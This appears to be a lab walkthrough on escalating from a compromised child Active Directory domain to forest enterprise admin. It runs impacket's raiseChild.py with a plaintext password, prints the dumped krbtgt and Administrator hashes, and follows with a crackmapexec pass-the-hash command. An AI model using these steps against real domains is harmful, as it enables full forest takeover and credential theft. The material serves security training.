RaiseMeUp - Escalate with impacket raiseChild

• Ok now imagine you have pwn the domain north.newyork.local you have dump the ntds and you got all the NT hash of all the north domain users.

As said by Microsoft the domain trust is not a security boundary

RaiseMeUp - Escalate with impacket raiseChild

• To escalate from child to parent the simplest way is with impacket raiseChild.py script, this will do all the work for us.

raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!

$raiseChild.py north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1! -debug -ts
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[2023-03-07 12:38:36] [+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket-0.10.1.dev1+20230216.13520.d4c06e7f-py3.9.egg/impacket
[2023-03-07 12:38:36] [+] Calling NRPC DsrGetDcNameEx()
[2023-03-07 12:38:36] [*] Raising child domain north.newyork.local
[2023-03-07 12:38:36] [*] Forest FQDN is: newyork.local
[2023-03-07 12:38:36] [*] Raising north.newyork.local to newyork.local
[2023-03-07 12:38:36] [+] Calling LSAT hLsarQueryInformationPolicy2()
[2023-03-07 12:38:36] [*] newyork.local Enterprise Admin SID is: S-1-5-21-620482180-1620433373-1814187987-519
[2023-03-07 12:38:36] [*] Getting credentials for north.newyork.local
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=north,DC=newyork,DC=local
north.newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b215421b300eb02228f7b4e8f8414201:::
north.newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:b85d7acc1aba6e1edb419d7b6735eeeb4014eb43731e9b4df9f525cb0d036f2e
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] VALIDATION_INFO before making it gold
[2023-03-07 12:38:36] [+] Getting TGS for SPN cifs/NYC
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [*] Getting credentials for newyork.local
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=newyork,DC=local
newyork.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
newyork.local/krbtgt:aes256-cts-hmac-sha1-96s:4860355d58ab70fb7446b46de1e21a430ff34234bda82c2498976f59cb5a7b48
[2023-03-07 12:38:36] [*] Target User account name is Administrator
[2023-03-07 12:38:36] [+] 192.168.56.10 is NYC.newyork.local
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NORTH.NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Trying to connect to KDC at NEWYORK.LOCAL
[2023-03-07 12:38:36] [+] Decrypting hash for user: CN=Administrator,CN=Users,DC=newyork,DC=local
newyork.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
newyork.local/Administrator:aes256-cts-hmac-sha1-96s:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827

• This create a golden ticket for the forest enterprise admin.

• Log into the forest and get the target info (default administrator RID: 500)

• All the job is done with one command, if you are lazy you don’t even need to understand x)

Authenticate with to verify the dump has is good

crackmapexec smb 192.168.56.10 -u Administrator -H ":c66d72021a2d4744409969a581a1705e" -d newyork.local

smbexec.py whoami????